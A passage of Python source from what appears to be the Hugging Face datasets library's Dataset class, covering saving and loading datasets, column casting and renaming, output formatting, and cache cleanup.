``fsspec.spec.AbstractFileSystem``, optional, defaults ``None``): Instance of the remote filesystem used to download the files from. """ if self.list_indexes(): raise ValueError("please remove all the indexes using `dataset.drop_index` before saving a dataset") dataset = self.flatten_indices() if self._indices is not None else self if is_remote_filesystem(fs): dataset_path = extract_path_from_uri(dataset_path) else: fs = fsspec.filesystem("file") cache_files_paths = [Path(cache_filename["filename"]) for cache_filename in self.cache_files] # Check that the dataset doesn't overwrite iself. It can cause a permission error on Windows and a segfault on linux. if Path(dataset_path, config.DATASET_ARROW_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_ARROW_FILENAME)} but a dataset can't overwrite itself." ) if Path(dataset_path, config.DATASET_INDICES_FILENAME) in cache_files_paths: raise PermissionError( f"Tried to overwrite {Path(dataset_path, config.DATASET_INDICES_FILENAME)} but a dataset can't overwrite itself." ) # Get json serializable state state = { key: dataset.__dict__[key] for key in [ "_fingerprint", "_format_columns", "_format_kwargs", "_format_type", "_indexes", "_output_all_columns", ] } split = dataset.__dict__["_split"] state["_split"] = str(split) if split is not None else split state["_data_files"] = [{"filename": config.DATASET_ARROW_FILENAME}] for k in state["_format_kwargs"].keys(): try: json.dumps(state["_format_kwargs"][k]) except TypeError as e: raise TypeError( str(e) + f"\nThe format kwargs must be JSON serializable, but key '{k}' isn't." ) from None # Get json serializable dataset info dataset_info = asdict(dataset._info) # Save dataset + indices + state + info fs.makedirs(dataset_path, exist_ok=True) with fs.open(Path(dataset_path, config.DATASET_ARROW_FILENAME).as_posix(), "wb") as dataset_file: with ArrowWriter(stream=dataset_file) as writer: writer.write_table(dataset._data) writer.finalize() with fs.open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "w", encoding="utf-8" ) as state_file: json.dump(state, state_file, indent=2, sort_keys=True) with fs.open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "w", encoding="utf-8" ) as dataset_info_file: # Sort only the first level of keys, or we might shuffle fields of nested features if we use sort_keys=True sorted_keys_dataset_info = {key: dataset_info[key] for key in sorted(dataset_info)} json.dump(sorted_keys_dataset_info, dataset_info_file, indent=2) logger.info(f"Dataset saved in {dataset_path}") @staticmethod def _build_local_temp_path(uri_or_path: str) -> Path: """ Builds and returns a Path concatenating a local temporary dir with the dir path (or absolute/relative path extracted from the uri) passed. Args: uri_or_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3://my-bucket/dataset/train"`) to concatenate. Returns: :class:`Path`: the concatenated path (temp dir + path) """ src_dataset_path = Path(uri_or_path) tmp_dir = get_temporary_cache_files_directory() return Path(tmp_dir, src_dataset_path.relative_to(src_dataset_path.anchor)) @staticmethod def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> "Dataset": """ Loads a dataset that was previously saved using :meth:`save_to_disk` from a dataset directory, or from a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `"dataset/train"`) or remote URI (e.g. `"s3//my-bucket/dataset/train"`) of the dataset directory where the dataset will be loaded from. fs (:class:`~filesystems.S3FileSystem`, ``fsspec.spec.AbstractFileSystem``, optional, default ``None``): Instance of the remote filesystem used to download the files from. keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section. Returns: :class:`Dataset` or :class:`DatasetDict`: - If `dataset_path` is a path of a dataset directory: the dataset requested. - If `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split. """ # copies file from filesystem if it is remote filesystem to local filesystem and modifies dataset_path to temp directory containing local copies fs = fsspec.filesystem("file") if fs is None else fs dataset_dict_json_path = Path(dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix() dataset_info_path = Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix() if not fs.isfile(dataset_info_path) and fs.isfile(dataset_dict_json_path): raise FileNotFoundError( f"No such file or directory: '{dataset_info_path}'. Expected to load a Dataset object, but got a DatasetDict. Please use datasets.load_from_disk instead." ) if is_remote_filesystem(fs): src_dataset_path = extract_path_from_uri(dataset_path) dataset_path = Dataset._build_local_temp_path(src_dataset_path) fs.download(src_dataset_path, dataset_path.as_posix(), recursive=True) with open( Path(dataset_path, config.DATASET_STATE_JSON_FILENAME).as_posix(), "r", encoding="utf-8" ) as state_file: state = json.load(state_file) with open( Path(dataset_path, config.DATASET_INFO_FILENAME).as_posix(), "r", encoding="utf-8" ) as dataset_info_file: dataset_info = DatasetInfo.from_dict(json.load(dataset_info_file)) dataset_size = estimate_dataset_size( Path(dataset_path, data_file["filename"]) for data_file in state["_data_files"] ) keep_in_memory = keep_in_memory if keep_in_memory is not None else is_small_dataset(dataset_size) table_cls = InMemoryTable if keep_in_memory else MemoryMappedTable arrow_table = concat_tables( table_cls.from_file(Path(dataset_path, data_file["filename"]).as_posix()) for data_file in state["_data_files"] ) split = state["_split"] split = Split(split) if split is not None else split return Dataset( arrow_table=arrow_table, info=dataset_info, split=split, fingerprint=state["_fingerprint"], ) @property def data(self) -> Table: """The Apache Arrow table backing the dataset.""" return self._data @property def cache_files(self) -> List[dict]: """The cache files containing the Apache Arrow table backing the dataset.""" cache_files = list_table_cache_files(self._data) if self._indices is not None: cache_files += list_table_cache_files(self._indices) return [{"filename": cache_filename} for cache_filename in cache_files] @property def num_columns(self) -> int: """Number of columns in the dataset.""" return self._data.num_columns @property def num_rows(self) -> int: """Number of rows in the dataset (same as :meth:`Dataset.__len__`).""" if self._indices is not None: return self._indices.num_rows return self._data.num_rows @property def column_names(self) -> List[str]: """Names of the columns in the dataset.""" return self._data.column_names @property def shape(self) -> Tuple[int, int]: """Shape of the dataset (number of columns, number of rows).""" if self._indices is not None: return (self._indices.num_rows, self._data.num_columns) return self._data.shape def unique(self, column: str) -> List[Any]: """Return a list of the unique elements in a column. This is implemented in the low-level backend and as such, very fast. Args: column (:obj:`str`): Column name (list all the column names with :func:`datasets.Dataset.column_names`). Returns: :obj:`list`: List of unique elements in the given column. """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") if self._indices is not None and self._indices.num_rows != self._data.num_rows: dataset = self.flatten_indices() else: dataset = self return dataset._data.column(column).unique().to_pylist() def class_encode_column(self, column: str, include_nulls: bool = False) -> "Dataset": """Casts the given column as :obj:``datasets.features.ClassLabel`` and updates the table. Args: column (`str`): The name of the column to cast (list all the column names with :func:`datasets.Dataset.column_names`) include_nulls (`bool`, default `False`): Whether to include null values in the class labels. If True, the null values will be encoded as the `"None"` class label. .. versionadded:: 1.14.2 """ # Sanity checks if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") src_feat = self.features[column] if not isinstance(src_feat, Value): raise ValueError( f"Class encoding is only supported for {Value.__name__} column, and column {column} is {type(src_feat).__name__}." ) if src_feat.dtype != "string" or (include_nulls and None in self.unique(column)): def stringify_column(batch): batch[column] = [ str(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = self.map( stringify_column, batched=True, desc="Stringifying the column", ) else: dset = self # Create the new feature class_names = sorted(sample for sample in dset.unique(column) if include_nulls or sample is not None) dst_feat = ClassLabel(names=class_names) def cast_to_class_labels(batch): batch[column] = [ dst_feat.str2int(sample) if include_nulls or sample is not None else None for sample in batch[column] ] return batch dset = dset.map( cast_to_class_labels, batched=True, desc="Casting to class labels", ) new_features = dset.features.copy() new_features[column] = dst_feat dset = dset.cast(new_features) return dset @deprecated() @fingerprint_transform(inplace=True) def dictionary_encode_column_(self, column: str): """Dictionary encode a column. Dictionary encode can reduce the size of a column with many repetitions (e.g. string labels columns) by storing a dictionary of the strings. This only affect the internal storage. .. deprecated:: 1.4.0 Args: column (:obj:`str`): """ if column not in self._data.column_names: raise ValueError(f"Column ({column}) not in table columns ({self._data.column_names}).") casted_schema: pa.Schema = self._data.schema field_index = casted_schema.get_field_index(column) field: pa.Field = casted_schema.field(field_index) casted_field = pa.field(field.name, pa.dictionary(pa.int32(), field.type), nullable=False) casted_schema.set(field_index, casted_field) self._data = self._data.cast(casted_schema) self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) @deprecated(help_message="Use Dataset.flatten instead.") @fingerprint_transform(inplace=True) def flatten_(self, max_depth=16): """In-place version of :meth:`Dataset.flatten`. .. deprecated:: 1.4.0 Use :meth:`Dataset.flatten` instead. """ for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in self._data.schema): self._data = self._data.flatten() else: break self.info.features = Features.from_arrow_schema(self._data.schema) self._data = update_metadata_with_features(self._data, self.features) logger.info(f'Flattened dataset from depth {depth} to depth { 1 if depth + 1 < max_depth else "unknown"}.') @fingerprint_transform(inplace=False) def flatten(self, new_fingerprint, max_depth=16) -> "Dataset": """Flatten the table. Each column with a struct type is flattened into one column per struct field. Other columns are left unchanged. Returns: :class:`Dataset`: A copy of the dataset with flattened columns. """ dataset = copy.deepcopy(self) for depth in range(1, max_depth): if any(isinstance(field.type, pa.StructType) for field in dataset._data.schema): dataset._data = dataset._data.flatten() else: break dataset.info.features = Features.from_arrow_schema(dataset._data.schema) dataset._data = update_metadata_with_features(dataset._data, dataset.features) logger.info(f'Flattened dataset from depth {depth} to depth {1 if depth + 1 < max_depth else "unknown"}.') dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.cast instead.") def cast_( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ): """In-place version of :meth:`Dataset.cast`. .. deprecated:: 1.4.0 Use :meth:`Dataset.cast` instead. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. """ if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) self._data = dataset._data self._info = dataset._info self._fingerprint = dataset._fingerprint def cast( self, features: Features, batch_size: Optional[int] = 10_000, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 10_000, num_proc: Optional[int] = None, ) -> "Dataset": """ Cast the dataset to a new set of features. Args: features (:class:`datasets.Features`): New features to cast the dataset to. The name of the fields in the features must match the current column names. The type of the data must also be convertible from one type to the other. For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset. batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to cast. `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to cast. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. num_proc (`Optional[int]`, default `None`): Number of processes for multiprocessing. By default it doesn't use multiprocessing. Returns: :class:`Dataset`: A copy of the dataset with casted features. """ if sorted(features) != sorted(self._data.column_names): raise ValueError( f"The columns in features ({list(features)}) must be identical " f"as the columns in the dataset: {self._data.column_names}" ) type = features.type schema = pa.schema({col_name: type[col_name].type for col_name in self._data.column_names}) format = self.format dataset = self.with_format("arrow") # capture the PyArrow version here to make the lambda serializable on Windows is_pyarrow_at_least_4 = config.PYARROW_VERSION.major >= 4 dataset = dataset.map( lambda t: t.cast(schema) if is_pyarrow_at_least_4 else cast_with_sliced_list_support(t, schema), batched=True, batch_size=batch_size, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, num_proc=num_proc, features=features, desc="Casting the dataset", ) dataset = dataset.with_format(**format) return dataset @fingerprint_transform(inplace=False) def cast_column(self, column: str, feature: FeatureType, new_fingerprint: str) -> "Dataset": """Cast column to feature for decoding. Args: column (:obj:`str`): Column name. feature (:class:`Feature`): Target feature. Returns: :class:`Dataset` """ if hasattr(feature, "decode_example"): dataset = copy.deepcopy(self) dataset.features[column] = feature dataset._fingerprint = new_fingerprint return dataset else: features = self.features.copy() features[column] = feature return self.cast(features) @deprecated(help_message="Use Dataset.remove_columns instead.") @fingerprint_transform(inplace=True) def remove_columns_(self, column_names: Union[str, List[str]]): """In-place version of :meth:`Dataset.remove_columns`. .. deprecated:: 1.4.0 Use :meth:`Dataset.remove_columns` instead. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. """ if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in self._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) for column_name in column_names: del self._info.features[column_name] self._data = self._data.drop(column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def remove_columns(self, column_names: Union[str, List[str]], new_fingerprint) -> "Dataset": """ Remove one or several column(s) in the dataset and the features associated to them. You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method is in-place (doesn't copy the data to a new dataset) and is thus faster. Args: column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset object without the columns to remove. """ dataset = copy.deepcopy(self) if isinstance(column_names, str): column_names = [column_names] for column_name in column_names: if column_name not in dataset._data.column_names: raise ValueError( f"Column name {column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) for column_name in column_names: del dataset._info.features[column_name] dataset._data = dataset._data.drop(column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.rename_column instead.") @fingerprint_transform(inplace=True) def rename_column_(self, original_column_name: str, new_column_name: str): """In-place version of :meth:`Dataset.rename_column`. .. deprecated:: 1.4.0 Use :meth:`Dataset.rename_column` instead. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. """ if original_column_name not in self._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if new_column_name in self._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: self._format_columns = rename(self._format_columns) self._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) self._data = self._data.rename_columns(new_column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def rename_column(self, original_column_name: str, new_column_name: str, new_fingerprint) -> "Dataset": """ Rename a column in the dataset, and move the features associated to the original column under the new column name. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset with a renamed column. """ dataset = copy.deepcopy(self) if original_column_name not in dataset._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if new_column_name in dataset._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @transmit_tasks @fingerprint_transform(inplace=False) def rename_columns(self, column_mapping: Dict[str, str], new_fingerprint) -> "Dataset": """ Rename several columns in the dataset, and move the features associated to the original columns under the new column names. Args: column_mapping (:obj:`Dict[str, str]`): A mapping of columns to rename to their new names Returns: :class:`Dataset`: A copy of the dataset with renamed columns """ dataset = copy.deepcopy(self) extra_columns = set(column_mapping.keys()) - set(dataset.column_names) if extra_columns: raise ValueError( f"Original column names {extra_columns} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) number_of_duplicates_in_new_columns = len(column_mapping.values()) - len(set(column_mapping.values())) if number_of_duplicates_in_new_columns != 0: raise ValueError( "New column names must all be different, but this column mapping " f"has {number_of_duplicates_in_new_columns} duplicates" ) empty_new_columns = [new_col for new_col in column_mapping.values() if not new_col] if empty_new_columns: raise ValueError(f"New column names {empty_new_columns} are empty.") def rename(columns): return [column_mapping[col] if col in column_mapping else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { column_mapping[col] if col in column_mapping else col: feature for col, feature in (self._info.features or {}).items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset def __len__(self): """Number of rows in the dataset.""" return self.num_rows def __iter__(self): """Iterate through the examples. If a formatting is set with :meth:`Dataset.set_format` rows will be returned with the selected format. """ for index in range(self.num_rows): yield self._getitem( index, decoded=False, ) def __repr__(self): return f"Dataset({{\n features: {list(self.features.keys())},\n num_rows: {self.num_rows}\n}})" @property def format(self): return { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self.column_names if self._format_columns is None else self._format_columns, "output_all_columns": self._output_all_columns, } @contextlib.contextmanager def formatted_as( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """To be used in a `with` statement. Set __getitem__ return format (type and columns). Args: type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow'] None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ old_format_type = self._format_type old_format_kwargs = self._format_kwargs old_format_columns = self._format_columns old_output_all_columns = self._output_all_columns try: self.set_format(type, columns, output_all_columns, **format_kwargs) yield finally: self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs) @fingerprint_transform(inplace=True) def set_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.set_transform`. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output. None means __getitem__ returns all columns (default). output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. It is possible to call ``map`` after calling ``set_format``. Since ``map`` may add new columns, then the list of formatted columns gets updated. In this case, if you apply ``map`` on a dataset to add a new column, then this column will be formatted: new formatted columns = (all columns - previously unformatted columns) """ format_kwargs.update(format_kwargs.pop("format_kwargs", {})) # allow to use self.set_format(self.format) # Check that the format_type and format_kwargs are valid and make it possible to have a Formatter type = get_format_type_from_alias(type) _ = get_formatter(type, features=self.features, **format_kwargs) # Check filter column if isinstance(columns, str): columns = [columns] if isinstance(columns, tuple): columns = list(columns) if columns is not None and any(col not in self._data.column_names for col in columns): raise ValueError( f"Columns {list(filter(lambda col: col not in self._data.column_names, columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if columns is not None: columns = columns.copy() # Ensures modifications made to the list after this call don't cause bugs self._format_type = type self._format_kwargs = format_kwargs self._format_columns = columns self._output_all_columns = output_all_columns logger.debug( "Set __getitem__(key) output type to %s for %s columns " " (when key is int or slice) and %s output other (un-formatted) columns.", "python objects" if type is None else type, "no" if columns is None else str(columns), "do" if output_all_columns else "don't", ) def reset_format(self): """Reset __getitem__ return format to python objects and all columns. Same as ``self.set_format()`` """ self.set_format() def set_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format` Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ self.set_format("custom", columns=columns, output_all_columns=output_all_columns, transform=transform) def with_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.with_transform`. Contrary to :func:`datasets.Dataset.set_format`, ``with_format`` returns a new Dataset object. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ dataset = copy.deepcopy(self) dataset.set_format(type=type, columns=columns, output_all_columns=output_all_columns, **format_kwargs) return dataset def with_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format`. Contrary to :func:`datasets.Dataset.set_transform`, ``with_transform`` returns a new Dataset object. Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ dataset = copy.deepcopy(self) dataset.set_transform(transform=transform, columns=columns, output_all_columns=output_all_columns) return dataset def prepare_for_task(self, task: Union[str, TaskTemplate], id: int = 0) -> "Dataset": """Prepare a dataset for the given task by casting the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`. Casts :attr:`datasets.DatasetInfo.features` according to a task-specific schema. Intended for single-use only, so all task templates are removed from :attr:`datasets.DatasetInfo.task_templates` after casting. Args: task (:obj:`Union[str, TaskTemplate]`): The task to prepare the dataset for during training and evaluation. If :obj:`str`, supported tasks include: - :obj:`"text-classification"` - :obj:`"question-answering"` If :obj:`TaskTemplate`, must be one of the task templates in :py:mod:`datasets.tasks`. id (:obj:`int`, default `0`): The id required to unambiguously identify the task template when multiple task templates of the same type are supported. """ # TODO(lewtun): Add support for casting nested features like answers.text and answers.answer_start in SQuAD if isinstance(task, str): tasks = [template.task for template in (self.info.task_templates or [])] compatible_templates = [template for template in (self.info.task_templates or []) if template.task == task] if not compatible_templates: raise ValueError( f"Task {task} is not compatible with this dataset! Available tasks: {list(unique_values(tasks))}" ) if not 0 <= id < len(compatible_templates): templates_list_str = "\n".join( f"- `{idx}` for task {template}" for idx, template in enumerate(compatible_templates) ) raise ValueError( f"Id {id} for task {task} is not in a valid range. Supported ids:\n{templates_list_str}" ) template = compatible_templates[id] elif isinstance(task, TaskTemplate): template = task else: raise ValueError( f"Expected a `str` or `datasets.TaskTemplate` object but got task {task} with type {type(task)}." ) template = template.align_with_features(self.info.features) column_mapping = template.column_mapping columns_to_drop = [column for column in self.column_names if column not in column_mapping] dataset = self.remove_columns(columns_to_drop) dataset = dataset.rename_columns(column_mapping) # We found a template so now flush `DatasetInfo` to skip the template update in `DatasetInfo.__post_init__` dataset.info.task_templates = None dataset = dataset.cast(features=template.features) return dataset def _getitem(self, key: Union[int, slice, str], decoded: bool = True, **kwargs) -> Union[Dict, List]: """ Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools) """ format_type = kwargs["format_type"] if "format_type" in kwargs else self._format_type format_columns = kwargs["format_columns"] if "format_columns" in kwargs else self._format_columns output_all_columns = ( kwargs["output_all_columns"] if "output_all_columns" in kwargs else self._output_all_columns ) format_kwargs = kwargs["format_kwargs"] if "format_kwargs" in kwargs else self._format_kwargs format_kwargs = format_kwargs if format_kwargs is not None else {} formatter = get_formatter(format_type, features=self.features, decoded=decoded, **format_kwargs) pa_subtable = query_table(self._data, key, indices=self._indices if self._indices is not None else None) formatted_output = format_table( pa_subtable, key, formatter=formatter, format_columns=format_columns, output_all_columns=output_all_columns ) return formatted_output @overload def __getitem__(self, key: Union[int, slice, Iterable[int]]) -> Dict: # noqa: F811 ... @overload def __getitem__(self, key: str) -> List: # noqa: F811 ... def __getitem__(self, key): # noqa: F811 """Can be used to index columns (by string names) or rows (by integer index or iterable of indices or bools).""" return self._getitem( key, ) def cleanup_cache_files(self) -> int: """Clean up all cache files in the dataset cache directory, excepted the currently used cache file if there is one. Be careful when running this command that no other process is currently using other cache files. Returns: :obj:`int`: Number of removed files. """ current_cache_files = [os.path.abspath(cache_file["filename"]) for cache_file in self.cache_files] if not current_cache_files: return 0 cache_directory = os.path.dirname(current_cache_files[0]) logger.info(f"Listing files in {cache_directory}") files: List[str] = os.listdir(cache_directory) files_to_remove = [] for f_name in files: full_name = os.path.abspath(os.path.join(cache_directory, f_name)) if f_name.startswith("cache-") and f_name.endswith(".arrow"): if full_name in current_cache_files: logger.info(f"Keeping currently used cache file at {full_name}") continue files_to_remove.append(full_name) for file_path in files_to_remove: logger.info(f"Removing {file_path}") os.remove(file_path) return len(files_to_remove) def _get_cache_file_path(self, fingerprint): if is_caching_enabled() and self.cache_files: cache_file_name = "cache-" + fingerprint + ".arrow" cache_directory = os.path.dirname(self.cache_files[0]["filename"]) else: cache_file_name = "cache-" + generate_random_fingerprint() + ".arrow" cache_directory = get_temporary_cache_files_directory() cache_file_path = os.path.join(cache_directory, cache_file_name) return cache_file_path def map( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[Union[str, List[str]]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): Function with one of the following signatures: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for 